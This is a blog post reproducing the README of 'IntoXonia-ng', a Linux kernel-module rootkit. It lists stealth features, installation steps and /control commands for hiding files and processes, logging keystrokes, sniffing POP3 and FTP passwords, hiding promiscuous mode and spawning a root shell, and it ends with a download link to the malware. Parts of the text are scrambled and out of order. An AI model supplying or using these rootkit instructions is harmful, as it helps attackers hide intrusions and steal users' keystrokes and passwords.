Thursday, 8 May 2008
Linux Lkm Rootkit for 2.6.x Kernels
IntoXonia - LKM rootkit for Linux Kernel 2.6.x
==============================================
1. History
———-
I have released first version of IntoXonia in 2005. There were different replies.
Rootkit was incompatible with 64-bit architecture because algorythm of searching the system
call table address didn’t work fine 
Also I’ve found a bug in getting full path to file.
In this version I have fixed known bugs and added new features (look ChangeLog). Method of
rootkit configuration IMHO changed in a best way. It is realised by fake binary file
but all the options are cathegorized.
Today, 05/28/2006 - is date of release of IntoXonia-ng LKM rootkit.
2. Possibilities
—————-
(*) hiding files & directories
(*) hiding processes
(*) fake removing files
(*) redirect opening of files
(*) redirect directory changing
(*) prohibition of opening files
(*) prohibition of directory changing
(*) adding fake line to the file
(*) hiding line in file
(*) replacing lines in file while reading
(*) protecting file of removing
(*) safe saving file before removing
(*) protecting processes
(*) making aliases for commands
(*) redirect of execution binary files
(*) prohibition of program execution
(*) registrating pressed keys (keylogger)
(*) sniffing POP3/FTP passwords
(*) loading/saving options to a file
(*) obtaining root privileges
(*) manual changing UID/GID of process
(*) secure file erasing
(*) configuring with the use of fake binary
(*) protecting configuration with a password
(*) promisc mode hiding
3. Installation
—————
I haven’t made a configurator yet, so you have to configure rootkit manually 
Three constants
are stored in file option.h. CONTROL constant contains path to fake binary which is needed for
configuring. PASSWORD constant contains authorisation password. After you have edited them, you
can compile and insert module:
# make
# make load
4. Configuration
————————–
Now all commands are unified As before, configuration is made with the use of fake
binary, by default it is /control. For configuring you have to authorize:
# /control auth
All command have the same syntax: # /control First parameter is a type of option. There are 6 types of commands: fs, task, prog, log, sniff, inet. # /control fs +link /etc/passwd /etc/passwd.old You can remove this rule by changing just one symbol: # /control fs -link /etc/passwd /etc/passwd.old Apart from main configuration rules a few other commands exist. They would be # /control close 5. File access options All commands for file access options begin with /control fs. Command: /control fs +hide /file Command: /control fs +remove /file Command: /control fs +link /file1 /file2 Command: /control fs +link /dir1 /dir2 Command: /control fs +deny /file Command: /control fs +line /file text task Command: /control fs +hline /file text Command: /control fs +repl /file str1 str2 Command: /control fs +protect /file Command: /control fs +save /file /dir/ 6. Options connected with processes There is possibility hiding and protecting of processes in this rootkit. You can hide process # /control task +hide pid Protecting means prohibition of sending signals to processes: # /control task +protect pid 7. Options connected with executing binaries All commands connected with executing binaries begin with /control prog. # /control prog +make /fake /command Now /fake will be interpreted as well as /command. # /control prog +link /prog1 /prog2 Now program /prog2 will be executing instead of /prog1. # /control prog +deny /prog This command will deny execution of /prog. 8. Keylogger configuration Keylogger is configured by the following command: # /control log + uid /file Argument uid conform to the user identificator, whose keyboard 9. Sniffer configuration This rootkit contains sniffer of POP3 and FTP passwords. To view all POP3 and FTP passwords # /control sniff +pop Filtered usernames and passwords are printed with printk(), so you can 10. Network configuration Hide PROMISC interface mode. Use it to hide working external sniffer 11. Saving and loading options All rules for files, processes, binaries, keylogger and sniffer may be saved to file, # /control save /file 11. Functions of immediate execution There are several commands in this cathegory: obtaining root privileges, manual # /control rootme The result is execution /bin/sh with root privileges. # /control setuid pid uid Secure file erase can be done by following command: # /control erase /file All these functions won’t work without authorization 12. Disadvantages IMHO, haquer has noticed that rootkit doesn’t contain traditional possibility of hiding 13. Disclaimer This module is designed to show possibilities of intercepting system calls in OS Linux. 14. Greetingz WildCat - translation And great thanx to my beloved girl Lika for the thing she exists You can communicate with me using e-mail: xdiman [at] mail [dot] ru Project home site: http://satanic.easycoding.org 28-05-2006 5:28 +++++++++++++++++++++++++++++++++++ Download From Here ->> http://backdoored.net/intoxonia-ng2[1].tar.gz
Next comes + or - depending on action - adding or removing a rule. Parameter “command” stands
for certain option and has it’s own specific arguments args.
Example: you can add redirect rule by following command:
mentioned later. Use “close” for closing configuration session:
———————-
Description: This command removes /file from directory contents.
Note: Correct work of ls /file is not a mistake because if you
correctly enter the full name of the file, then you
know that it is there.
Description: This command makes fake file removing.
Note : Use this option if you want to avoid any reference to the file.
Description: Redirecting to /file2 when opening /file1.
Note: to delete a rule you need to type all parameters that were
typed when adding. Example:
/control fs -link /file1 /file2
Description: Redirecting to directory /dir2 when changing to directory /dir1.
Note: both directories must be typed without trailing ‘/’.
Description: Deny any access to /file.
Description: Adding fake text ‘text’ to the end of /file which
can be read by program ‘task’.
Description: Hiding all lines containing ‘text’ in /file.
Description: On-the-fly replacing str1 by str2 in /file when reading.
Description: Protecting /file from removing.
Description: Automatic saving /file in directory /dir/ when removing.
Note: you have to type ‘/’ at the end of path to directory here
———————————–
with the following command:
——————————————–
You can make alias for binary with the following command:
Aliases are made for executing hidden or forbidden binaries.
There is also redirecting for programs:
Prohibition of executing binaries is made with ‘deny’ option:
————————–
actions will be logged to /file.
————————
and usernames, type the following commands:
# /control sniff +ftp
view them with dmesg program.
————————-
# /control inet +promisc
program.
——————————
and loaded when you start rootkit next time. There are two commands for it:
# /control load /file
————————————
changing UID/GID of process and secure files erasing. To get root privileges, type:
To change UID/GID of process with PID identificator manually type following commands:
# /control setgid pid uid
—————–
netstat contents. It is realized by hiding certain lines in /proc/net/tcp and /proc/net/udp
so IMHO it is not a disadvantage 
But unfortunately there are some others. Firstly,
rootkit is not compatible with 64-bit architecture. Secondly, all options are stored
in kernel space, where memory is not swapped. Although rootkit works fine on most 2.6
kernels, system call table cannot be found on new ones. Some kernels make Oops after
module unloading. It is not critical - it happens because of read() system call
intercepting. Also, I don’t know whether rootkit is compatible with X.
————–
I don’t guarantee that it’ll work without bugs. Author has no responsibility for using
this program in improper ways.
————-
EH0T, Vishnyaaa - translation
Roneon - moral support, ideas
Elena Arishina - moral support
DarkEagle - introducing me to scene
Dpoke Wizard - first user
Victor Makarov - hacking, testing
ShadOS - hacking, testing
Kolya aka prox - testing
Oberon - testing
DJ KolbasoID - cool trance
DJ Tiesto - cool trance also
THC - information
OpenNet.ru - information
Linux.Org.Ru - information (+ help on forum)
SecurityLab.ru - information (+ thanx for prize on competition :))
Vitaly Zaicev - hosting
And thanx to you, c001_H4ck3r, that you’ve read this trash up to the end
_4epen aka Self Assured Addict %)
From ShadOS
